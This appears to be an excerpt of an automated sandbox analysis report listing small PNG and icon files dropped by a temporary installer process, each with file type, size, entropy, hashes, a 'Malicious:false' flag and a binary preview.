                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ........................................................E@...K...$..].......................................#.../...C...N0...]!..^...J..............................A&......P...U17>.FOX.Q\g.Vbm.z:..j)..J...].."............A..4^...C;@.OWa.Ual.ox...............^\.y5..g*..x-..."......L...`...]%..................................j#..}7...G...5.T....8..Ic........................................<...K...O#..E.......A..h'..............w...v................I...u4..]$...F..Y!......v&.h&.............................V`j..C....@..m0...J..|(......{)..E!..zq.ehm..........................C...n...<..S..z'.......7.g:.i7".....TUY..................rY..O..._ ..~3.....y(......K..|7.{C#.._;..~E.^E0.{oj...~.lRP.e3...x3..v..q...;..v'......R...1..d9..yM.(:...v*..<..v'..b....^...o$...>..y...+..i.#..........8q.}0..r.......N..h...^%...<..S.....?...1..p...................p"......{..w..W..L..N..A...5...*..u$..........................].:..-..J..;......|(..y&..u
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):946
                                                                                                                                                                                                                                                          Entropy (8bit):7.732040020903732
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7Md+AhCq2Ci1b9Hm4UEtkvfdjXxYoCa0jn5/Pt1hC5VbxePpNS/XnxQmHm3EZ:hwRUEtWzxvC1RPpC5Vd4NS/Xnxjnn
                                                                                                                                                                                                                                                          MD5:2F8627CE7D0210CE8A83A237AC9E7FFB
                                                                                                                                                                                                                                                          SHA1:1F7C014538E93EDF5EAB0721AB007C946EDE8130
                                                                                                                                                                                                                                                          SHA-256:CD701C56968BF7138417063032D62ADAFC272C8C6FC98D527AEA342359DA0F7D
                                                                                                                                                                                                                                                          SHA-512:CCDA7916E676BA730D0FE9F803E9CFFF37BEED65B9DA776DA6113B33A75ED351E699D9923B68D37AD83BA04A123815A160E53F24840DF73580802AA510BFF81F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...yIDATx.mSmlSU.~.mo..s...].I[....2..]*c..($K.D...1.jP....2...HH4.D...3!.c..c...l...M...]........u?..{sN.7'O....!......N.d'mP.4.kf#.L*...N..J......H.,...F..$ ..._. .".B.B.dO.....?.7.?...]Q`...f.-. ).22..,.,W.x..f.X....l>z....{...I..`<b.....4,U5..[.U.KSq,f.H&.{g....2...#.Pt)....aJ.g...[?...{@<.<L.....m...3n..oG..d.\_{.h..=...>L...NC.v..#.h...cu..........%l{...a(c.H./..h}.h.v_13U..5...b....I....W.e.Y.?.-...h....-..M..y8....'.._b..#E/.Q...'<.8.n. I.O$...^.C..8.Z3n...XM....................V3..c..6.@V..P`...=LNL.6.....(l...)A...-S...c."...|...N....;}J. ...Q...2h.....tt...R....~z.I(.._.L....z?Z.jd...$I.@D!..-....G..0iA))Y..k.r.n.H.S!...m.*.:j.p:..-[... ......_........).UL#7...?9.l$..Q.V.6.".N.^...k,6.1.CZ.".....!....";.....e..e.]..VV..^Rb...&c.UW...f-m1.tn..2..*...`....Y........B.f.e.......`.k*.z..".......W q.U."dZJW.3o.'.u...?..O........m V.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.995757173580584
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:kV8FtQm5AZDsVYmrJcEa7RjyWtYmmatOjk:k6FtQXwY2CEalWyYbatOjk
                                                                                                                                                                                                                                                          MD5:D7F9CD5B7E1275B24EB50769BBBE3021
                                                                                                                                                                                                                                                          SHA1:0B213D27ABDB5016B1805C2FCE5238196F48718C
                                                                                                                                                                                                                                                          SHA-256:414BDEC0A45A95F08390272EDFFF615879E3D0116FFA38AE341770327C8A69ED
                                                                                                                                                                                                                                                          SHA-512:8688C65B158C7F26424C9AF3E59382D7C59155D14377965B14277BE36D49012610D7ADC719E0CC6FFC3946B9D08174FC048E121FDB13104B7BD68365F15130DC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ....................................................................................................................................................................................................................................................................................................................................................................................................................................................41..2/..................................................||...#...'...'... ..tr......................................ig.."(...+...+...*...)...$..XW..............................RO..**..%...#-.. ,...,...+...+...%..87......................C@..63..01..-0..*0..&...#-..$-...,.. -...&..#"..............=:..<8..96..74..52..22...1...1..)/..&...#-.."-...(...!..~{..C@..;8..?;..>:..?;..96..:6..74..42..01..21..-0..)/..%..."+...!..=:.=:..=:..<9..;8..85..64..41..3/../,..,)..)&..&%.."$...#..."............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):604
                                                                                                                                                                                                                                                          Entropy (8bit):7.566535696722621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/71+R52wdTd01ObCNVVeNROSj6OjPXgEFE7LEgcuq/yp61MVKCXXN:bR5RG1iwVsRPj68vgvEgcN/RKVBXN
                                                                                                                                                                                                                                                          MD5:4AC295DB7E483693981CDE5340D6DD06
                                                                                                                                                                                                                                                          SHA1:2940C14BCC2C1C975D7DC484C43618F8028350A3
                                                                                                                                                                                                                                                          SHA-256:5DF1EB6894459E748C599DEA4119DBD85F8EE024A7932ADC49E80AED7BC3CDE2
                                                                                                                                                                                                                                                          SHA-512:05562C55530620A0860B6E636C45F035ACAFFF4F468B3F29491D909C795102377F778951033B93A8C143D87D7F779E03381E415B914EB1E8198EB0E838243E18
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...#IDATx.S.k.Q..f7b.j.m).c+.h.F.(.......?@.....x*..^..A/J....TAk......&b]-".....yo...evf.........LP9=...........Z*H.!.....1..r.*.....u......8bi..$b...~..m,..&k..47=.U..A...Z......M...9N..4V.._C.....o.. b.nN"..OE....d.].1A...|.C..}85;...@Bp.t.A..wW.B7......&.Q......D..p..}l...Bm..j..K#E..Y.t.pc.._<G....r_...X.;1..w...f.......b...uK..XF..c|y..{...../a......<...+....F.......r..<..Je..k.y....08v.kk....|>.r.,.............J...}..f...M.|'Z.6.m....;3..B'.Mo........pf3.v.....>....4cL&m.F......&1+.... )....kri.......g...ip;...A.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.472732468708232
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:eO+ZmtXn7q6EQAkkUNtYa1TBExcA8CNJF22222yLIXTN:eO+4p7q/QAtqTexR8M22222sIXZ
                                                                                                                                                                                                                                                          MD5:F81E507FDAD67F58488CF3D937594180
                                                                                                                                                                                                                                                          SHA1:59C646FB4F2808E0020BDF1728237F067B3264D2
                                                                                                                                                                                                                                                          SHA-256:DCA19404AB1499715ED30AFCA88E4BD85371BADC6A51E1677EAEB1DFFC8CA289
                                                                                                                                                                                                                                                          SHA-512:70FAB93C992E18FE77C53C2DAC203B2F599DCD888D55015E668B2DB149AE51BCA7DF6A772D5FB4633D038BFEB6CFBF4CF64C3384031E7DE4BC23BA6948171357
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .....@...............................................oL..pM...............................................n.3.y...|..~...~...|..y...n.5.............................y...................................y..1!...................|...........................................}...............z.;..................1..|..........0..............{.?......................$.....h.........p...................a...............\................................g.....+.......D.........................................../.../.......U.............................3............3.}...".."..".."..8.....................].....!.."..........%..&..&..&..&..&..&..W.............$..&..%..........'W.)..)..)..)..)..)..)..)..2..A..)..)..'[.............+..,..,..,..,..,..,..,..,..,..,..+..................*...../../../../../../../../.....*.......................%../e.0..1..1..1..1..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):712
                                                                                                                                                                                                                                                          Entropy (8bit):7.689986023244019
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7hFFKT/SNQRb8l3lGQdnJ5l9hfP5Y3OLHLeTS8T38YuFc5Hdp8rMPLQX:2rW/SNQRgl38UnJ5Vfy3OjLZ8T38YuFz
                                                                                                                                                                                                                                                          MD5:BA4DA486665B6C79F792A39BF6F03ACF
                                                                                                                                                                                                                                                          SHA1:3746A3488D981870D9CDC6FE16DD6C8171DE6E0F
                                                                                                                                                                                                                                                          SHA-256:5444F65B5694092DD587F8C3E8BB44E159556E45688C856BD5F9515FAD6FF2B8
                                                                                                                                                                                                                                                          SHA-512:9C3D87AEB7C2E5CF5FC08DBF666E9DBBBE431EF71BB83D5C769C9F88DDFB41934C404D72985E320B6BAF0C9F1FF45E057B82C76EBA54BFA01BF2456533F3C0D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.S]HSa.~..;.gS..,KDSG6I....$..D....*......B.X....].".EH.Be%.$^x.*.....!.b.%..s..Y..%..q...>..>...4. .....&s.~W...X}./..YO....R............h.....Ju....$....e...ij.O...\..%..w..pp-..8I.x...5.]..u.$vo.J.(....b..h..TC.K...>1D.p(.po..5.i...}..:.eP..a..edGs.C.v.y2t..)...OGMA..$..J.v....)|...$.7Ed~.E.[.J..1...n..'.......BaD..[.) ....(~.1PA...U^<@.y.=,5c\'(rYP[.@yN*.0...\.)FV..Q......3.hK.Rb?.j.....j^....q"?.......-....'...)..'.QD...7..U.....^...w.g.........>.......o*?e..o.>Bl.A.]+d....C..f4..C......7...?..V...RZ.;/D.V..(...G5"...G.wO.L.D..K-.m-. !......`M...p...evT.L..].....:.P.{...@L..R..r[..?.1.`...+N=...i@S"j2......2!.c....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.54214238379203
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:6eIPdVt3Mxoi5U7YoFhqG0f9tX9vWHpWcd9JU:6NCSFhqlvWHpWcd96
                                                                                                                                                                                                                                                          MD5:A7F6DC763A6C440673C6A65E1174379F
                                                                                                                                                                                                                                                          SHA1:E3FE4B3EA5D58231C0326BD5BA9BC1A15D6C095D
                                                                                                                                                                                                                                                          SHA-256:442AEC90EE87A5859CB87703F0ADA203796A24A36F8FA7AAA5C80E87995F1E65
                                                                                                                                                                                                                                                          SHA-512:6A06B633363C13F056B8A23CEB3D507427F26DEC1844A043D49B99BB7F95C18BA21A1F08457E7A714F17A6D1A04ECC6DCEDB855D439E5D881F6D3CFB3C7517CB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................9z.q6t..0q../v..'f..3g......-Y.i.X..7w..:{..6w..9{.z............,~..G...!.......D............E.......,...)...0................r.>1...M...............................6...6....v.'................7.......................................5.................#...#SM......./G..2I..........................Vw.. ..\........1"&...#.^hw.....,A..@Q..........................&...$...$.......A22.-.#.C?F......-...-..4O..Mf..~...............&...%...8/......C44K<./.=:n..+...6..'E...=..%I..3S...?...2..%;..).(.0$&.?43K......../+`..)......%0..@O...'...,...*...-...$...5..-2..('g.).!..........$.0!2......................................$0...)................y...[.*.".........Z...(...............$."...A.....................+ #.,.".+.".....................&.".%.".5.-."...................-"%.6&(.2#$...........o.........!...%.".,''.....................-#$)P;:.Q96.....................&.!.%.!." .5........................I97`fMJ.J53.0#%.*.".(.!.'.!.&
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):888
                                                                                                                                                                                                                                                          Entropy (8bit):7.7525569355376955
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MyC90RfzncoB9d+Jfty3DKiuhnS1nWXpvQTMmy5ZKr+NLQymmFT040q11aZ2:eJ6iDKNdanodwMmyvKr2+40q1UFWVt
                                                                                                                                                                                                                                                          MD5:D060EB33F8B5DFA18682625CE21C1F46
                                                                                                                                                                                                                                                          SHA1:DEC3B1DE06D2D855408C16D93365711088BBE705
                                                                                                                                                                                                                                                          SHA-256:F6C2720D108D96B429E82883EE44CE7EEC31F4194DA99391DC023D6797FA0886
                                                                                                                                                                                                                                                          SHA-512:BBBCDC3E03214E686DCB05094ADE3A9FFB510CB5BF4DAF28B607BC50349C1B675074AE7EF4DB99E86A00C661B31473D858353EB3DB8734639E8FF00B71AAEC6A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...?IDATx.m.[l.U..33...N.e..m..n.mS....$...Z.. .....K..>..D..`h.D....@..... .4B...,...-.,.......t5....s......;./.huC..]./.d.M.0.3t0....u'.../..o...n-.U.~<..OS.`.-.n..a0..9<..._@U......m..|....W..y.....g...;. J.e.C..s...5............./....i.".....6I..o...TF..#....=r`N.[.....>R.S..p.(...%.B.%....W{..-@....cr|....D~.CF..3...q5W...*....k....&..58..40I.+V.."....A.f...e 9^.l....6:.Q....Z..i9..;..6..-.....aX<..1Kqc:w.L.||.d K..V.....o8.6......qA...............;#.h........_I}..S..H.........$....`.A_R.\...r.D9.....fz|%g....,...N.......n^...v...v;8..(Y.[..P......P0...AB".Rf..vl.On..C.u.(.C..I....h9....\..t..c.c...Xr~...}..^z...(..m....[L)..g.8]......2....v.7.......R..;...^..B........F....k...%.o2.. .^=Q.!.......b..%....P.T.U<v....(..A..w...........M1M7.SS..6fS.mB%..7.....M5....A9.:'...Q^..j...Y.s-.\ |l......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.518492008840673
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:XTZmE/ZYQwseqlUQQSbG1tHhRNyYkTHHSD:XTgEGiSnZiL8
                                                                                                                                                                                                                                                          MD5:6F6B30B331D4B1B52218C3EE9F6008E5
                                                                                                                                                                                                                                                          SHA1:99BB8C47F45B605BA74866586F9B2AC64CAE082A
                                                                                                                                                                                                                                                          SHA-256:E5995C8370B5C383F7B3A60F3A79D3A67650A85C3A954D208E4736F4021BE24E
                                                                                                                                                                                                                                                          SHA-512:1BA21D5611D96D7090F3A9E80E1DBBE34C390E02AA7145354F069253B0D440D488D24F385CC2A0A9469A9D5D9EFED10D4D1F15A8D36969497593A2B60903B885
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...........................................................................................................v.........@...@...........................................p...Xy..........................p...................0...........X{..Y|..Z~..[...\.....................0.................Wy..Xz..Y|..Z}..[...\...........i...`.................P.....Wx..Wz..Y{..Z}..Z~..z...................`...j.........0.........Wy..X{..Y|..Z~..........................`...`.........p.......Xz..Y|..Z}..............q..........._..._..._.................Y{..Y}..y...........]...]...^...r......._..._...................Y|..Z~..............\...]...............^...^...................Z}..y...............\...................]...]...................Z}................[...................]...\.........`...0.....d...Y}..........Z~..z...............[...\...p......... .............d...Y|..Z}..Z}..d...y...Z}..Z}..Z}..e.......................................n...Y|..Y|.......
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):728
                                                                                                                                                                                                                                                          Entropy (8bit):7.626939687751021
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7xDWhiMwp8cPv8arNXzjOxin+3sSsNGI+dlb1TXiaG/deT7gYIaMXv3wjxyUU:mDmiMc8cPv8apjjOxA+3sDNGI+pyN/dH
                                                                                                                                                                                                                                                          MD5:19F3CB0BD386402E675788B7D56970F4
                                                                                                                                                                                                                                                          SHA1:EB8E440BC41C57BFEAA8E684C1E95008A3B53161
                                                                                                                                                                                                                                                          SHA-256:12EDB57B3DC1F4FC152FB9DC44E69E669182C36A543E3F9335B14E7BF9AA4787
                                                                                                                                                                                                                                                          SHA-512:030099A142FB428E231C9050304EA59BBFA9AF9E281FCFF0E80F3A2DA4113AA0953D0CD629B269310A47EC901279BB7C0FF5C2C922342AD813296832065022BF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..ML.Q....m....D..('...P...r.r1...1....... .^.b.1.?b...#z....&~..L(zP..F..nK..^.....L...7.....C.....y...;m!...!c.e...dUhf....&.^K.Ce.f.V........M..@a..R.k..&.....l:..E..W.H.0.....\8+LC..2..r....!........G18..\g...r...ca:!5....\)N.......77PVaF......q...p.....`..sI)....%.E.z.`.]...(5.?O.^.%....X...kLRz<.<.......jO...@..F\jP.g.....W...\.H.......:..:...l.&H....L.x7....-:JQ...{..e=..p..(..?.....R.P.8j.T.6....t..f.VC)|..3.g8..q..%.kn*....#S...........e.....r4_g()g....ER..?d..+i...Nc3U.B....)...#...q...j...g..U..0)P.S1VQ..R....q..t..C..$5R....~Y...Be....*.Y@j.....J...X. .y...6z..B...p.J.y...a..b...)....fb.t..7.@.6&...m..>/j........Z.......(f.U.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1342
                                                                                                                                                                                                                                                          Entropy (8bit):4.6359350276939795
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:dji7RcfMBrFZ4SJP/eM3Oa6xkbHITYphkt:djUcfsr1xG9Ypmt
                                                                                                                                                                                                                                                          MD5:DA65CA13005C823DFDB8A02C0F534EA1
                                                                                                                                                                                                                                                          SHA1:555B00EAB24107ED4B1E86A30E634DED6A3B172C
                                                                                                                                                                                                                                                          SHA-256:73A10CE1010DDF27AD68552766FD5803E9DDAFB7ACE123822E6EB2FD69954D9A
                                                                                                                                                                                                                                                          SHA-512:576FC82838F477AB1806433240C1508184C1E00B5365A2F5719A3FA53DEFD4AE71A6ED5A262F5D174AAF089F46F677332D270C154AC6185E8616DF1D0E53BC17
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .(.......(....... ..... ........................................E...D...........................?.............................................d...~...............................\....M...d.>...m.G...C...C...C...C...F.....{...........................o.C...C...C...C...C...B...B...B...B...o.N................<........C...C...C...B...F.....e.......b.@.B.....|........?........G...C...C...B...j.J.....................B...F.................C...C...B...n.P.........k.K..........n.B...C.................C...B...T.-.........F...B...C...C...B...C...C.................C...B..........`.=.B...C...C...C...C...C...C................C...A..............B...C...C...C...C...C...C.................H...B.............h.B...C...C...C...C...C...F..............1.......B...i.H....E...C...C...C...C...C...C.....|........>...........x.Z.B...B...C...C...C...C...C...C...v.V................................J...C...C...C...C...H...........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):830
                                                                                                                                                                                                                                                          Entropy (8bit):7.743747035981289
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MppO0bioeoVRws0LZivpCt1BIwB2QG9Qs1Vzaok9cz7A1oLVDiDkaBx9q8rS:hg0OX6wVduQywAQG9vSkEQiDY5aA7
                                                                                                                                                                                                                                                          MD5:EB5BFEE784207B0EED0CB53FB3CF7509
                                                                                                                                                                                                                                                          SHA1:519EEA88024FE4ABBA292A5097D879D42EEFC813
                                                                                                                                                                                                                                                          SHA-256:450B1779BBDB391E340B1A142C0F2AB89836F6E7BDEAA864F9D660059129F13E
                                                                                                                                                                                                                                                          SHA-512:0404FF8FFCDB1F8A1935837883102FF113EC3E18E550544F7B33D8554D8DFE4EEAF3590A88E9C62A02AFCCDA0946E17BDF2700FD85CF84E912CDDDF09CB883E9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.u.iHTQ......q2...f"K3...2.6[....5d......J..PadHE.m..mS9QD.E..Q.eaD..c.Fn.::.{...YM....{~...._.?..".Yqo...i&9,..W.ie..2....,x=.J.mR....sV...=w.\.....5.0'r...p...A.<.u.....j..~:...u..w...~Sf..Xc..a9../..<.1.....ks....9.7..Uf.D0....H......B...IR6.\$s..%.2.|:.)!..[..0.....o......f.6....'Ud.(..x.#.c...v8..'......]....0.".T.Zn.>..}_......@...QP{.B....G..";&...&v}<.bj.....6a.m.f<.E......[....b.1./.....H.M9..Z........%q......bs......|..%.z.wcp.Y.$.I......oJ.m......[s.'[...:..N[....|.r...$.b......L7.B..M.n...jx.q!.2.!...I.^.!...6..>*.9.=..~Y.....L.dd..F~.8Pw..J-.mY.(~.c......7..W.f'.n.q1.D}..J...1....Re..t.,........A.g.Gy..x...|.+c..+.2......f.....{.ui=.....@U...;...U.........Jz....o"...e...J.x.im..{...!.......O@s.O....0X.7f'K.g8......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.106456125169888
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nEPSZPkAOaXJtA62XWFFFFpkne+FqQ/9tTb:nEiVrJth2mFFFF2B/zTb
                                                                                                                                                                                                                                                          MD5:BBE192389A8CA57807477962B401ACF4
                                                                                                                                                                                                                                                          SHA1:C83E12B14231768D76436CCF919B52D7017801AF
                                                                                                                                                                                                                                                          SHA-256:D546F20D90D384C9A3AF269B16D2C3B06E0500B43668DECA44E7BD50AA525037
                                                                                                                                                                                                                                                          SHA-512:53B9B4EB7E2B1D598AD360B376090AF6A7EC7A4E83D44932E08E8A9D1545BA3BBA9AC7B29B0E2A52F2F02524D79D8A0070FA77D24D2398BD377A975B85B92B74
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...............................=...=...=:..=v..<...<...<...<...<...<...<v..=:..=...=.......?...?...>...>...>...>...>...>...>...>...>...>...>...>...?...>...A...@...?...?...?...?...?...?...?...?...?...?...?...?...@...A...B:..A...A...A...A...A...A...A...A...A...A...A...A...A...A...B:..Cu..C...C...B...A...A...A...A...A...A...C...A...A...C...C...Cu..E...E...D...S.......................L...g...s...D...E...E...G...G...D..........................................E...G...G...H...H...G.........................................G...H...H...J...J...I.........................................I...J...J...L...L...K.........................................K...L...L...N...N...L...}..................v...L...p...{...M...N...N...Ou..O...O...N...N...N...N...N...M...N...O...N...N...O...O...Ou..Q:..Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q:..Q...S...S...S...S...S...S...S...S...S...S...S...S...S...S...Q...T...T...T...U...U...U...U...U...U...U...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):542
                                                                                                                                                                                                                                                          Entropy (8bit):7.521572092864423
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7VDZbIJn0vRHCeQgHr8zLKMqUuwmUL27QyFY7:xN0vRHCej+m2bR27QyF6
                                                                                                                                                                                                                                                          MD5:686CF19C035D7BB3523CF7FDF3F39F13
                                                                                                                                                                                                                                                          SHA1:862BDC58F8EB03A07C866566FFCFA7228987899C
                                                                                                                                                                                                                                                          SHA-256:3FDF0CE404773A9703AC716DCA370D349A630E7A2098BE497D0C472CAE80C38B
                                                                                                                                                                                                                                                          SHA-512:7F8EF9F4D6D8AE5E6DAE76DDA7C8B389C3EC1DFE022FDA23790731272EEE7AD209CCD5890D3142B1C7F57D557A1A27202534A3085AD3A734071A898F1E0B6512
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.SMHTa.=w.....!...6-"B..MRB.Q.\.."..U..U.....F:3..X.M..G.t!..KI.T...w;..~.1......~..'...W..K..."n.W.q.....1........tB.G..........\.VE..E...q''.B/.D...\..j.#'~...T-G.c.*..(..&.DZ.N.+GT.o...~.s..(*..g..K..."...t..60..X...fv....~.F.).....H...nv..)...y.`~U......4.....0.]5..l..+..eT7.C....$..u:A...d.....`..%..../.......dh-..?..&.....(....O.)u......$..a.^..A..."Dwk_1...U ...,.i..A.T....3D..._.Z...l$1..p.....A+_l..`.=R..d6.T...K..OSL..f..nu_...g...S.3.L....r........g.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.511795576297305
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:ON6zzzzzKMSSSSSMa5HVyx7UmImSoH2bnDIjPNNJOtDrc53VrVOt/bQt8wQHz/HC:OD5H4lUbJfUIQ4lQ4j+HPKoCP652q
                                                                                                                                                                                                                                                          MD5:9A89DE631D87C981A0AF3C07FD4AF610
                                                                                                                                                                                                                                                          SHA1:6A5EE66ADA6C57C1FB8B142514DEE3272FF21605
                                                                                                                                                                                                                                                          SHA-256:5E9C12BB009E1DB9568B273B53EBCA3500C3E6D113961729ADF98012FEE299B8
                                                                                                                                                                                                                                                          SHA-512:B3F9BB8803CEAE7E33611BDED0C236C0A14DC6DE730A15910BD80ED15D1CF63BF8A83449E4EB83F593F9FC82C7E4C775AD799A206D3EEC93F8EA99B3746D005F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
